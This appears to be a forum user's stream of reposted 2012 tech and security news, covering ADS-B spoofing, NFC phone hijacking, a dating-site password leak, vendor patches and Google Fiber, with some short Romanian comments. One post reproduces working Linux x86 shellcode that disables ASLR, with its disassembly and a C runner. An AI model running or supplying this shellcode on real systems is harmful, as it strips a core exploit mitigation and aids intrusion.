DarkyAngel

Air Traffic Control Systems Vulnerabilities Could Make for Unfriendly Skies [black Hat] Researcher Andrei Costin discusses the security challenges facing ADS-B technology and how attackers can spoof air traffic signals. The skies may not be as friendly as some people think. In a talk at the Black Hat USA conference, security researcher Andrei Costin discussed the possibility of spoofing signals to air traffic control systems in attacks – all courtesy of roughly $1,000 worth of equipment. After his presentation, he sat down with SecurityWeek and revealed more details of how attackers could exploit weaknesses in the Automatic Dependent Surveillance-Broadcast (ADS- technology. Costin, who is a PhD candidate at Eurecom - a research institute in France - said that the security issues he talked about in his presentation have been known for a while, though no one had actually demonstrated them. The weaknesses he demonstrated could potentially have large future implications, as the U.S. has mandated that the majority of aircraft operating within its airspace to be equipped with some form of ADS-B Out by 2020. "Our intent was to make a practical demonstration of the attack, [with] the idea that the right people see the easiness and the cheapness of the attack so they can fix it now before they have the potential of a user can do the same thing," he said. To launch the attack, he used software-defined radio, which he said could be purchased for around $1,000. He also used an ADS-B receiver in order to verify the spoofed messages were being accepted. Because there is no encryption or authentication mechanism protecting ADS-B messages, the information can be intercepted and spoofed by attackers. For example, the attacker could mount a replay attack, intercepting packets with flight information in the air and then replaying them back to a targeted system. "It is impossible to verify that the message is a real one or a spoof, and that it comes from a legitimate aircraft or device," he said. "It's an architecture issue…the protocol and the messages have to be improved in order to support authentication and encryption." This could have safety as well as privacy concerns, because an attacker could determine the location for example of a private jet. Though it is possible to use filed flight plans to rule out a spoofed signal indicating a plane is at a particular place that becomes difficult if there are a large number of planes involved, Costin explained. He said he is unaware of any attacks like this taking place in the wild, though he speculated that it would be just a matter of time before it happened. "The complexity I would say is medium," noting that acquiring the necessary hardware is simple, but the attacker would need to have some knowledge of digital signal processing. In a statement released to the media, the Federal Aviation Administration said it conducts ongoing assessments of ADS-B vulnerabilities and has a "security action plan" that mitigates risk. The agency also stated that it monitors the "progress of corrective action," and plans to maintain about half of the current network of secondary radars as a backup to ADS-B in the event it is needed. Costin however, was more skeptical of the situation. "The main mitigation that is currently helping is that they don't use [ADS-B] as a primary…radar," he said. Sursa

AuthenTec makes fingerprint sensors and identity management software for mobile devices. Apple's Cupertino campus. Apple is getting serious about mobile security. The Cupertino, Calif., company has agreed to acquire security technology company AuthenTec for $356 million, according to a filing with the Securities and Exchange Commission made by AuthenTec. The $8-a-share offer for AuthenTec represents a 58 percent premium over its Thursday closing price of $5.07. CNET contacted Apple for comment. We'll update the story when the company responds. An AuthenTec spokesman confirmed the deal but said it wouldn't be adding any more detail. Apple is just the latest company to get swept up in the increasing interest in mobile security. With increasing reports of mobile malware, viruses, and other threats, the wireless industry has stepped up its defenses. Carriers such as AT&T and Sprint Nextel are increasingly talking about security as the next big service, while a number of mobile security firms have sprung up in recent years. AuthenTec makes fingerprint sensors and identity management software that's deployed in mobile devices, computing and networking companies, service providers, and governments. It counts Samsung Electronics, LG, Cisco Systems, and Motorola among its customers. Earlier this month, Samsung tapped AuthenTec's virtual private network security to power its business-class smartphones and tablets. Sursa

Happy sysadmins day ! s? ridic?m cele 1336,(9) pahare în cinstea lor!

ce ai reu?it s? furi cu ele de e?ti a?a pasionat? welcome aboard.

The online call service company responds to recent chatter that it was lax on security and privacy, especially when it came to government peeping. Skype has come under fire this past week for allegedly letting the U.S. government use its service to spy on its users. The online call service company is now saying that's simply not true. "Some media stories recently have suggested Skype may be acting improperly or based on ulterior motives against our users' interests," Skype Chief Development and Operations Officer Mark Gillett wrote in a blog post today. "Nothing could be more contrary to the Skype philosophy." Skype serves 250 million active users a month and supported 115 billion minutes of calls in the last quarter. It is specifically being accused of facilitating law enforcement wiretapping of conversations. These accusations point to changes that have happened in the service since it was bought by Microsoft in May 2011, most notably the way calls can be intercepted. In the blog post, Gillett goes point by point to explain Skype's side of the story. Here are some highlights: According to Business Insider, Skype keeps users' personal information in its system for 30 days, which is probably why it mentions that it will cooperate with law enforcement when "legally required and technically feasible." However, Federal investigators got access to Skype conversations between Megaupload founder Kim DotCom and his colleagues over the course of five years and supposedly didn't have to ask Skype for anything. Nevertheless, Skype maintains that it's primary interest is providing the best product it can to its users. "In addition to solving the challenges of scaling and providing reliable, dependable communications that people love, we operate globally and have an obligation to operate responsibly," Gillette wrote. "We are committed to doing a great job at both -- providing a phenomenal experience for all users, and acting as a responsible global citizen." Sursa

An unsecured wireless network led an Indiana SWAT team to the wrong house. An Indiana SWAT team recently followed up on anonymous online threats by bursting into a house using flash grenades -- only to find that they had come to the wrong place. "Turns out the home had an open Wi-Fi router, and the threats had been made by someone outside the house," writes Ars Technica's Nate Anderson. "Whoops." "Imagine you're sitting at home, comfortable on the couch, watching the Food Network, when all of a sudden a heavily armed SWAT team breaks down your door and storms into your living room," writes SecurityNewsDaily's Matt Liebowitz. "That's what happened to 18-year-old Stephanie Milan, who was watching TV in her family's Evansville, Ind., home ... when a team of police officers broke down her storm door -- the front door was already open -- and tossed a flashbang stun grenade into the room." "Workers were at the Milan home on Friday repairing the storm door and broken window," write the Evansville Courier & Press' John Martin and Mark Wilson. "Carpet inside the house was stained with black residue from the flashbang grenade." "A day after the raid, 18-year-old Stephanie Milan’s cellphone and laptops were still being held by police," writes Digital Journal's Anne Sewell. "Moral of the story: just smack a password on your router," writes Geekosystem's Sui Ying Teoh. ?tirea e destul de veche ( ~ 1 lun? ) , dar merit? postat?, am v?zut c? nu e pe aici

How do you provide military-grade secure wireless network connectivity to 6,000 hackers? We take a look inside the Network Operations Center at the Black Hat 2012 conference. LAS VEGAS. With over 6,000 attendees, the Black Hat Wi-Fi network is one of the most hostile networks on Earth. Attendees routinely test the network and attempt to exploit both the show as well as other attendees. The job of provisioning and defending the Wi-Fi network at Black Hat falls to Aruba Networks. It's a job that Aruba has been doing at Black Hat both officially and un-officially for the last seven years. For this year at Black Hat, Aruba deployed more than 35 access points across multiple session rooms to deliver seamless connectivity. Aruba engineer Robbie Gill explained to eSecurity Planet that approximately 15 of those access points are connected in a mesh topology. In a mesh, each access point can connect to another access point in order to provide backhaul connectivity. The others can be directly connected to the main controller. Rogue access points is one of the challenges faced by Aruba. Clogging the available spectrum, these rogue access points often turn out to be mobile handsets with Wi-Fi sharing capability turned on. Donald Meyer, senior manager of product marketing at Aruba, explained that his company has a technology called Adaptive Radio Management (ARM) that will automatically move across different channels in order to find one that is less congested. For end users, there is no disruption as the Aruba network continuously adjusts to conditions in the air. Aside from rogue access points, Gill faces other type of challenges as well -- including denial of service and spoofed access points with Karma. At this year's event, Aruba is only providing WPA-PSK security, as opposed to the more robust EAP/TLS (Extensible Authentication Protocol – Transport Layer Security). With EAP/TLS each user has their own key, whereas with PSK the key is known. As such, WPA-PSK is not as secure as the EAP/TLS option that was available in 2011 at Black Hat. Gill noted that as long as users maintain proper security best practices -- not sending data over clear text and stick to HTTPS/SSL secured sites when submitting sensitive information -- there shouldn't be much risk. Watch the full video: Sursa

hmm, nu l-am testat, nu sunt acas? pân? luni.. probabil mergea mai demult

As some broadband providers grumble about the cost of network upgrades and threaten data caps on subscribers, Google shows them, through its Kansas City Google Fiber project, how to offer subscribers 1Gbps broadband service at an affordable price. Google is showing the cable companies and telecommunications providers how a broadband network should be built. On Thursday, the company took the wraps off its new Google Fiber and Google Fiber TV services, which through a fiber connection directly to the home, delivers broadband speeds of 1Gbps on both the upload and download links. It also announced its new Google Fiber TV service that offers a vast array of high quality HD video content broadcast to TVs and is also available on demand. The services that Google is delivering to lucky residents of Kansas City, Mo., and Kansas City, Kansas, is leaps and bounds above what they can get currently through providers, such as AT&T's U-verse service or Time Warner Cable. But it's also much more advanced than what the average American is able to access from any cable operator or telco broadband provider in the country. And Google is offering it at prices that beat the local and even national competition. In fact, Google will be delivering speeds that are more than 100 times faster than most broadband users get today. And on the TV side, the company has included enhancements, such as doubling the number of TV shows that can be recorded by a DVR at one time, plus it offers more than 500 hours of storage for very high quality HD video. Google hasn't said yet whether it will deploy a fiber network in any other cities. The company is focused on Kansas right now. But it's clear that the deployment is strategic for Google. Even though most users today don't need Internet access at 1Gbps, Google is showing what's possible. And the company hopes that applications and uses for the ultra fast network will evolve to fill the pipe. But the network itself is also a way to show the rest of the broadband industry how they should be building their own networks to offer much faster speeds, which in the long run benefits Google's advertising and search businesses. And it offers Google data that it can use to nudge cable operators and phone companies to be more aggressive in upgrading networks and offering services at lower prices. "This is a strategic business for Google," Kevin Lo, general manager for Google Access, said in a phone interview from Kansas City. "And on a national level, this is about innovation and access to an abundance of technology. There is a bottleneck right now in residential access where people are only getting speeds of 5 Mbps." And even though he didn't directly say it, he made the point that the Google Fiber network can be seen as a challenge to what broadband providers have offered in the past. "The last time we doubled the speed of broadband a whole new market evolved and spurred tremendous growth in the Internet," he said. "We don't want incremental change. Offering you a 10 Mbps service and edging it to 50 Mbps and then 100 Mbps, that's not what drives real innovation. We need to do something in a big way that will take a material step in performance." What Google can teach broadband operators Google's chief financial officer, Patrick Pichette, described during the presentation introducing Google Fiber how computing power thanks to Moore's Law has grown through the years doubling every 18 months. And he showed how the cost of network storage has fallen dramatically, paving the way for cloud-based services such as the ones offered by Google. But network access speeds have remained relatively flat over the past several years. The result has been only incremental changes in the speed of services that are offered to consumers. "We saw a doubling of speeds for Internet access in the early years as we went from 14 kbps to 28 kbps," said. "But then after the cable modem showed up, we've seen little progress in access." Pichette also pointed out that even though speeds have only increased incrementally on a per megabit basis, Americans are still paying more for Internet access than consumers in other countries. And this is where Google is also showing existing operators a thing or two. Google is offering 100 times faster speeds on a service that is less than half the cost of the fastest Internet services available in the country today. The 1Gbps broadband-only service is only $70 and also includes 1 Terabyte of data storage. This compares to Verizon's Fios service, which charges $205 for a 300 Mbps service with 65 Mbps uploads. Like Google, Verizon also delivers its broadband service over a fiber connection linked directly to the home. But unlike Google it doesn't offer these faster speeds with symmetrical bandwidth speeds. When packaged with its TV service, Google's services are also priced affordably. And they beat the offerings from local competitors, such as Time Warner Cable. For $120 a month, Kansas City residents can get the 1Gbps broadband service and the Google Fiber TV service plus 1 Terabyte of data in Google's cloud storage service Google Drive.Google is even throwing in the $200 Google Android Nexus 7 tablet at no additional cost, so that users can use the Android App to control the TV service and even watch TV on their tablet. And Google is giving away basic broadband service with speeds up to 5Mbps downstream and 1Mbps upstream for free for the next seven years, so long as users pay the $300 cost of hooking the fiber up to their home. Time Warner Cable, Google's biggest competitor in this market, offers a 50 Mbps Internet service for an introductory price of $80 a month. And its total package with TV service and home phone service included is $200 a month. Time Warner was unable to put an executive on the phone to discuss the differences between the Time Warner network and the Google Fiber network, but a spokesman said this in a statement: "Kansas City is a highly competitive market and we take all competitors seriously," he said. "We have a robust and adaptable network, advanced products and services available today, and experienced local employees delivering local service. We are confident in our ability to compete." For Google, Lo said competition is necessary to drive the market. "At Google we think competition is always a good thing," Lo said. "In our core business, we are always a click away from being irrelevant, so our engineers wake up knowing that they must stay ahead of the competition." Google has been tight-lipped about if or where else it might deploy a similar fiber network. But even if the company doesn't expand the service beyond Kansas City, the fact that it has been able to develop a service that offers so much bandwidth could be enough to shake things up among broadband providers. "At this point you'd be hard-pressed to see any reason to have 1Gbps connections into a home," said William Weeks, technology fellow at TEconnectivity, a company that helps operators deploy fiber networks. "I think what Google is trying to do here is prove the business case for building such a network and offering these speeds. They'll have their own numbers that they can show if the cable operators and telcos tell the FCC tha they can't build more capable networks more rapidly." Indeed, Google seems to be making the case for why broadband providers need to up their game and offer faster services at lower prices. And even though the network won't be a direct threat to cable operators like Comcast or Verizon, which don't offer service in Kansas City, it could be used as a counter-argument to these companies' complaints and threats about Google and other Internet services eating up too much bandwidth. Recently, Internet service providers, such as Time Warner Cable and Comcast, have placed limits or caps on their services. And some have suggested that Internet companies, such as Netflix, should pay more for content delivered to their customers over a broadband provider's network. Google's execs say that with a fiber network, there is no need for these restrictions. And the company has not put a cap on broadband usage. Google as market instigator The Google Fiber initiative isn't the first time that Google has tried to push the market forward. In 2007, the company lobbied for open access conditions on wireless services that used the 700 Mhz spectrum block. And after it won that battle, in 2008 it bid on the spectrum, forcing the winner of that auction, Verizon, to adhere to FCC requirements. Google has also dabbled in community-based Wi-Fi and launched a citywide network in Mountain View, Calif. It's also deployed a broadband network at Stanford University. And in 2010 it unveiled plans to build the Google Fiber network. More than a thousand cities wanted to be considered for the network. But Google chose Kansas City. In other parts of its business, Google has entered new markets to stir things up and drive innovation. Its Nexus line of mobile products has been developed to use the best components available to make the most technologically advanced mobile devices. The hope is that developers use these devices to create new applications and innovate in mobile. "I think in general people misinterpret our motivations for building the Nexus products," Patrick Brady, who works for Google and helps develop the Nexus products, said in a recent interview when asked if Google is concerned about making money on its Nexus products. "It's about building and driving the ecosystem." The same strategy is likely taking shape here, where Google is likely not going to emerge as a nationwide broadband player but instead is trying to shape the broadband business to increase speeds and thus increase the functionality of its own Google products. While commercial broadband providers may be slow to ramp up speeds and drop prices to make high-speed network connections affordable to the masses, other organizations have sprung up to push more fiber-based networking. Last summer, a consortium of universities called GigU banded together to deploy 1Gbps fiber networks in communities and towns near universities. And earlier this summer, the White House along with the National Science Foundation's GENI (Global Environment for Network Innovation) program launched "US Ignite," an initiative that will bring startups together with local and state governments, federal agencies, universities, and others in the tech community to develop a national 1Gbps network. "We know we are going to need more network capacity as we do more things online," said Jim Baller, president of the Baller Herbst Law Group, who has advocated for community-based fiber networks for years. "But the question is how will we get there? And that's what these initiatives are doing, which is bringing players together and stimulating interest and dialog." Sursa

With new features for enterprise mobile app developers, Oracle Identity Management 11g Release 2 enables the extension of authenticated access beyond the four walls of the organization. In enterprise IT, identity is a cornerstone technology providing authorized access to employees in a manner that can be tracked for compliance. It's a role that Oracle's Identity Management portfolio has been providing for years for wired devices -- and is now being extended in the 11g R2 release to a new generation of mobile requirements ushered in by Bring-Your-Own-Device (BYOD) trends. Amit Jasuja, vice president of development for Oracle's Identity Management and Security Products, explained to eSecurity Planetthat the new release takes care of a number of persistent mobile challenges. One of those challenges is the issue of cached passwords on mobile devices. With many mobile apps, passwords are cached on the device, in an effort to make them easier to use. The risk is that if that password is not properly secured in the cache, the user identity could be at risk. "Companies that are building apps have typically been rolling their own security solution for passwords on the mobile side," Jasuja said. "What we're doing is providing a layer on top of our web single sign-on that extends to mobile apps." Jasuja added that the mobile apps also need a security client that provides proper procedures for password hashing protection. As part of the Oracle Identity Management 11g Release 2 update, there is a Software Development Kit (SDK) for mobile developers that provides the tools necessary to natively talk to the REST interfacesthat are available on the server side. REST is a web protocol that is used for the transport of data, including identity information. Going a step further, the identity engine leverages the oAuthstandard to enable single sign-on across multiple mobile applications. "We've had the single sign-on experience in the web world and now we're extending that to the mobile world," Jasuja said. Social identity integration is also part of the identity release. Using the OpenID standard, Oracle can now also pass identity information to social sites as well web signups. The way that works is when user information needs to be submitted for a particular site, there is a dialog box that pops up asking for authorization. Once that authorization is given, the user information can be transferred to the third party site in a secured manner. The Oracle Identity Management 11g Release 2 builds on the existing capabilties that the initial release of the platform first delivered. "The whole message here is with Oracle Identity Management 11g Release 1, customers had a platform that provided basic capabilities around user provisioning and web single sign-on," Jasuja said. "Now we're taking those capabilities and extending them into the mobile, social, and cloud world." While Oracle is extending identity to mobile devices, it is not delivering a full Mobile Device Management (MDM) experience. "When you think about MDM and BYOD, we're not focusing on that as that's not our core market," Jasuja said. "Our focus is on companies that are building apps for their customers." That said, Oracle's software does have the ability to identify a number of mobile characteristics that are sometimes associated with MDM technologies. For example, jail broken devices can be detected and whether or not there is a password policy for the device. "We do have integration with device characteristics but it's not full MDM," Jasuja said "We are working with MDM vendors, to provide tighter integration in the future." Sursa

Password leak at meetOne A data leak at the meetOne dating site allowed anyone to access private data including the plaintext passwords, email addresses and real names of the site's approximately 900,000 members. To obtain the data, an attacker simply needed to increment a URL parameter. After they were informed by The H's associates at heise Security, the operators soon closed the hole. When news of a data leak in one of the dating portal's custom APIs was disclosed to heise Security, the editors managed to reproduce the problem and access the data of a specially created test profile. The API disclosed information including the email address and password of the test user, which allowed access to the user's profile. Once logged in, the editors could have accessed any data, private messages and photos stored with the user profile. However, logging in wasn't actually required to retrieve sensitive information – most of the data was already available through the API. Labels such as "sexuality", "childrenNumber", "schooling", "yearlyIncome", "relationshipTyp" or "searchOneNightStand" provide some idea of the havoc a malicious data thief could have wreaked with this information. After heise Security informed meetOne co-founder Nils Henning, the vulnerability was closed within hours. Henning said that the "scope of the hole is limited" because "no sensitive data such as billing information was retrievable at any time". The executive didn't clarify why the company thought that information such as plaintext user passwords was not considered to be "sensitive data". The operators cannot guarantee that the hole has not been exploited in the past and say that they have "reset all passwords". However, on checking at 7.30 pm on Wednesday evening, all passwords that were tested by heise Security were still functional. To be safe, users who have previously created a profile with this site should change their password – and, importantly, they should also change passwords on any other services where they may have used the same password. Founded in Germany, the dating portal is now operated by US company meetOne International LLC. Nils Henning continues to work for Hamburg-based meetOne GmbH, a company that now regards itself as a service provider to the LLC and "mainly handles support tasks". Sursa La facebuci când urmeaz??

IBM closes holes in mail filters and WebSphere MQ IBM has patched two security flaws in the mail filters of Lotus Protector for Mail Security and Proventia Network Mail Security that affect all versions of these products. A cross-site scripting vulnerability allows an attacker to inject JavaScript code into the browser of an administrator with an active session on the system. The other vulnerability allows administrators to gain access to files on a server that they should not have access to. Both vulnerabilities have been patched for versions 2.5.x, 2.8.x and later of the affected products. Users with older versions of the software must upgrade to version 2.5.x before they can install the patch. IBM has also patched a flaw in version 7.1 of its WebSphere MQ communication platform. The vulnerability allows users to access the queue manager even if they are not allowed to do so. This problem has been fixed in Fix Pack 7.1.0.1 for WebSphere MQ. Sursa

Oracle's file converter holes endanger many server services Some of the holes that Oracle closed last week affect more than just Oracle software, because Oracle's Outside In library is used in many other products to convert files of different formats. As well as Microsoft's Exchange Server and SharePoint, products from Cisco, HP, IBM, Novell, Symantec, McAfee and others are affected. Strictly speaking it is not a single hole, but fourteen holes in the parsing of certain types of tile. The affected file formats are .VSD, .WSD, .JP2, .DOC, .SXD, .LWP, .PCX, .SXI, .DPT, .PDF, .SAM, .ODG and .CDR. A program that opens a specially crafted file with the Oracle libraries is fundamentally compromised. A range of server services are affected, including anti-virus scanners like McAfee GroupShield, but also specific desktop applications that need to handle different file types, such as the Guidance EnCase Forensic toolkit. One of the US-CERT advisories lists a number of companies and products that use the Oracle libraries and are also vulnerable. Among them are Cisco Security Agent Guidance EnCase Forensic Kroll Ontrack IBM OmniFind Enterprise Edition Novell Groupwise McAfee GroupShield and Host Data Loss Prevention Symantec Enterprise Vault A longer version of the US-CERT list apparently does not include all affected products; for example Avira Antivir for Exchange is reported to also use Outside In. It is still unclear whether all products that use Outside In are vulnerable – there are, for example, several print servers on the list. Microsoft has a dedicated advisory published on the vulnerability. It is also unknown whether, or when, the various manufacturers will have patches for their products ready for customers. Update 26-07-12: Avira has told The H's associates at heise Security that Antivir for Exchange is using Microsoft Jet Engine and Microsoft Access as its database and is therefore not affected by the vulnerability. Sursa

linux/x86 - ASLR deactivation /* Title: Linux x86 ASLR deactivation - 83 bytes Author: Jean Pascal Pereira <pereira@secbiz.de> Web: http://0xffe4.org Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 70 61 63 65 push $0x65636170 8048068: 68 76 61 5f 73 push $0x735f6176 804806d: 68 69 7a 65 5f push $0x5f657a69 8048072: 68 6e 64 6f 6d push $0x6d6f646e 8048077: 68 6c 2f 72 61 push $0x61722f6c 804807c: 68 65 72 6e 65 push $0x656e7265 8048081: 68 79 73 2f 6b push $0x6b2f7379 8048086: 68 6f 63 2f 73 push $0x732f636f 804808b: 68 2f 2f 70 72 push $0x72702f2f 8048090: 89 e3 mov %esp,%ebx 8048092: 66 b9 bc 02 mov $0x2bc,%cx 8048096: b0 08 mov $0x8,%al 8048098: cd 80 int $0x80 804809a: 89 c3 mov %eax,%ebx 804809c: 50 push %eax 804809d: 66 ba 30 3a mov $0x3a30,%dx 80480a1: 66 52 push %dx 80480a3: 89 e1 mov %esp,%ecx 80480a5: 31 d2 xor %edx,%edx 80480a7: 42 inc %edx 80480a8: b0 04 mov $0x4,%al 80480aa: cd 80 int $0x80 80480ac: b0 06 mov $0x6,%al 80480ae: cd 80 int $0x80 80480b0: 40 inc %eax 80480b1: cd 80 int $0x80 */ #include <stdio.h> char shellcode[] = "\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68" "\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61" "\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f" "\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08" "\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31" "\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80"; int main() { fprintf(stdout,"Lenght: %d\n",strlen(shellcode)); (*(void ()) shellcode)(); } # 1337day.com [2012-07-26] Sursa

In addition to this article .. Android and Nokia smartphones hijacked via NFC At the Black Hat information security conference in Las Vegas, security specialist Charlie Miller has demonstrated the potential risks of Near Field Communication (NFC), a standard that has already been integrated into many smartphones: the researcher managed to use NFC to infect smartphones from different manufacturers with malicious code – without any need to interact with the smartphone owner. During his nine months of research, Miller focused on the applications that access the radio interface. The most well-known app is probably Google's Beam, which has been factory installed on all Android devices since Android 4.0 (Ice Cream Sandwich). If a victim's smartphone is placed in the vicinity of a tag that has been tampered with, the phone's browser will be launched and will access a web site – in this case one that contains malware exploits for Android. For the demonstration, Georg Wicherski from Crowdstrike contributed a vulnerability in the Webkit browser of older Android versions (up to Gingerbread) that allowed Miller to take control of the device. The researcher says that 90% of all Android devices still have an old, and therefore vulnerable version of Android installed. The bug can, in principle, also be deployed via other channels, but the NFC technology allows infections to be successful without any user interaction. The Nokia N9, which uses Nokia's MeeGo operating system, was infected in a different way: the device is factory set to accept arbitrary NFC communication and will, for example, automatically display images or Office files that are sent this way. Miller says that the file rendering applications contain numerous bugs that can cause buffer overflows and enable attackers to take control of a device. An attacker can also activate the N9's Bluetooth interface via NFC and then pair the device with a notebook. According to Miller, it is then possible to send premium-rate SMS text messages or call premium numbers, export the address book, and access the N9's filesystem. As NFC only has a range of a few centimetres, attackers and their NFC tags or NFC-enabled phones must get very close to their victims. Miller therefore considers it more likely that malicious tags could, for instance, be attached to advertising posters, or that NFC terminals could be exchanged for modified ones. Sursa

YouTube ofera functia de blur a fizionomiilor in clipur YouTube a introdus o noua optiune, ce permite ascunderea fetelor. Cu un singur click, utilizatorii pot accesa functia de blur a fizionomiilor in clipurile incarcate pe site. Tehnologia nu este perfecta, astfel ca ascunderea fetelor din videoclipurile postate pe YouTube poate avea si erori, insa functia pare un pas inainte pentru pastrarea anonimatului online, scrie CNET. Functia "Face Blurring" introdusa de YouTube nu este selectiva, astfel incat toate fetele detectate automat vor fi ascunse. Pentru accesarea ei, da un click pe numele de utilizator in pagina de YouTube si acceseaza Video Manager. Odata ce ai ales clipul dorit, foloseste meniurile Enhancements > Additional Features > Apply. Daca esti multumit de rezultate, butonul Save As modifica definitiv clipul incarcat. Din pacate, noua functie YouTube ii va proteja si pe cei care se filmeaza facand cascadorii la volan pe autostrada sau torturand animale si va ingreuna identificarea si pedepsirea lor. Sursa

Black Hat: Hacking Back - The Best Defense May Not be the Best Offense A new survey of Black Hat attendees shows many are not afraid to fight back against hackers with their own tactics. The legalities of cyberspace can be complex – particularly when organizations consider whether offense is the best defense. Nevertheless, the subject of just where the line is came up in more than one talk at the Black Hat USA conference in Las Vegas. During his presentation, Robert Clark, operational attorney for U.S. Cyber Command, laid out this scenario: you are a system administrator, and poor security practices lead to theft of intellectual property on your watch. "What…is my first thought - if I pick up the phone and call the CEO, I'm freaking fired," he said. "I'm out of a job. So what can I do?" While it might be tempting to dig through your organizations logs, track the data theft to its source and delete the files off the server, that action can be fraught with legal dangers, he explained. For example, accessing the server for example could be a violation of the Computer Fraud Abuse Act, he noted. "So you're in there, and you see your files there…I've got to elevate my privileges to delete [the files] off of there…. congratulations, count two of the Computer Fraud Abuse Act," he said. Earlier this week, nCircle polled 181 people at the Black Hat conference in Las Vegas and discovered 36 percent said they engaged in retaliatory hacking in the past. “There’s a huge difference between a security expert who can qualify attackers and apply appropriate responses and a neophyte who reacts blindly," said nCircle CTO Tim 'TK' Keanini. "The best strategy for most companies is to forget retaliation and concentrate on improving their defenses.” During his presentation at Black Hat, former FBI Assistant Director Shawn Henry argued that organizations needed to "step up" in the fight against cyber-criminals – but added that he did not mean cyber-retaliations should be in play. Instead, organizations should focus on gathering intelligence that can be used to both catch and defend against attackers. "We need to understand who the adversary is, because if we understand who they are, we can take proactive measures," said Henry, who today is president of CrowdStrike Services, an arm of security startup CrowdStrike. While more than a third responded to the company's survey stating that they had either hacked back once (23 percent) or frequently (13 percent), Keanini said the actual percentage may be even higher. “Retaliatory hacking is a huge topic at Black Hat this year, but we should take these survey results with a grain of salt,” he said. “It’s safe to assume some respondents don’t want to admit they use retaliatory tactics. It’s very tempting to strike back out of anger and frustration. However, as infuriating as cyber criminals can be, this ‘eye for an eye’ code of justice can be extremely dangerous." Sursa

Apple Pulls Security Covers Back at Black Hat Apple has not always been the most open company when it comes to discussing security. But for roughly an hour Thursday, Dallas De Atley, manager of the platform security team at Apple, stood in front of a crowd of attendees at the Black Hat USA conference and outlined the company's approach to protecting iOS. When Apple began designing the iPhone, he said, the company quickly realized there were aspects to developing a secure smartphone that were different from other computers at the time. That idea helped drive the phone's security model. "Security is architecture - you have to build it from the very beginning," he said. Unlike a laptop, a phone is "always connected" and "does not fully go to sleep" like a laptop would if a user closed the lid, he said. The fact that a smartphone can contain a significant amount of personal data and be easily misplaced also played an important role in Apple's approach, he added. Starting with Apple's Secure Boot chain and continuing on to the topics of code signing and sandboxing, De Atley did not cover any unexpected ground; instead, he largely rehashed material from a whitepaper Apple released in May. While Google Android has been the focus of attention for much of the malware in the mobile world, the iPhone has not been without its challenges. The company's approach has not stopped researchers from poking around and trying to figure out ways to circumvent Apple's protections. In fact, a number of talks at Black Hat covered exactly that, attempting to poke holes in the iOS security blanket in order to steal data from the phone. "The phone has personal data," he said. "It knows who you call, who you send email to, what websites you visit (and) what games you play. These devices know an awful lot about how we live our lives, and they've become a critical part of how we interact with people." Sursa

Firefox 16 va integra aplicatii web si compatibilitate cu Firefox OS Mozilla a introdus compatibilitatea cu aplicatii web in versiunea alpha a Firefox 16. Noul browser va include si compatibilitate cu Firefox OS, sistem de operare asteptat in 2013. In timp ce Firefox 15 se afla abia in stadiu beta, cu o data de lansare in luna august, Mozilla lucreaza de zor la integrarea aplicatiilor web in urmatoarea versiune, Firefox 16. Compania va deschide pana la sfarsitul anului si Mozilla Marketplace, de unde utilizatorii vor putea descarca aplicatii, scrie CNET. Firefox 16 include numeroase imbunatatiri, de la interactiunile cu VoiceOver pe Mac pana la imbunatatiri de functionalitate pentru citirea fisierelor PDF. Mozilla pregateste aplicatiile web atat pentru Firefox 16 cat si pentru Firefox OS, sistemul de operare mobil ce va fi lansat la inceputul anului viitor, urmarind sa ofere aceeasi experienta utilizatorilor indiferent de platforma folosita. Sursa

Vezi cum arata Lumia 910 si wallpaper-ul principal din Windows 8 Mai multe informatii noi referitoare la Windows 8 si Windows Phone 8 au ajuns astazi online. Sursele sunt credibile, asa ca va prezentam si noi noutatile. Windows Phone 8 - Lumia 910 / 920 In primul rand, se pare avem deja o data aproape confirmata pentru lansarea primelor smartphone-uri Nokia cu Windows 8. Este vorba despre Nokia Lumia 910 si Nokia Lumia 920, dupa cum afirma site-ul WPdang (China) , citat de Slashgear , care vor fi lansate in data de 5 septembrie, la Helsinki, la evenimentul Nokia World. Pretul Microsoft Surface ar putea fi prea mare Potrivit Geek.com, Microsoft ar putea comercializa primul model al tabletei PC Surface cu un pret mult prea mare pentru a fi competitiv pe o piata deja dominata de nume importante. Un site din Suedia a pus deja la vanzarea tableta Microsoft (pentur rezervari) la un pret de peste o mie de dolari (1005 dolari). Microsoft nu a comentat informatia pana acum, dar daca acest pret se confirma, Microsoft ar putea inregistra un mare esec de marketing cu prima sa tableta. A aparut wallpaper-ul default Windows 8 Microsoft se pregateste sa anunte lansarea Windows 8 RTM, iar ultimele detalii referitoare la sistemul de operare incep sa "scape" pe internet. Astfel, cei de la TechIT, citati de The Verge, sustin ca au intrat in posesia wallpaper-ului principal al noului sistem de operare. Cele doua flori din imaginea default a Windows 8 ar trebui sa concureze celebrul Bliss, care a facut cariera in existenta Windows-ului.

DeadMouse - navigheaza pe net doar cu tastatura (Google Chrome) O noua extensie pentru browserul Google Chrome permite navigarea online doar cu tastatura, fara mouse. DeadMouse permite utilizatorului sa aleaga cu usurinta linkurile din pagina atunci cand incepe sa scrie textul asociat acestora. Navigarea online doar cu tastatura este mai simpla decat suna cu extensia DeadMouse pentru Google Chrome. Extensia cerceteaza textul din pagina ce include linkuri si indica apoi utilizatorului linkul ales pe baza textului introdus cu tastatura, scrie LifeHacker. Odata ce a selectat un link prin extensia DeadMouse, utilizatorul o poate deschide sau poate folosi tasta "Tab" pentru a naviga intre optiunile puse la dispozitie de program. Cu tasta "Enter" sunt deschise linkurile din Google Chrome cu extensia DeadMouse, iar cu tasta "Del" se anuleaza selectia. Deocamdata extensia Google Chrome nu are functionalitate 100% cand intalneste elemente Flash in paginile vizitate. Sursa

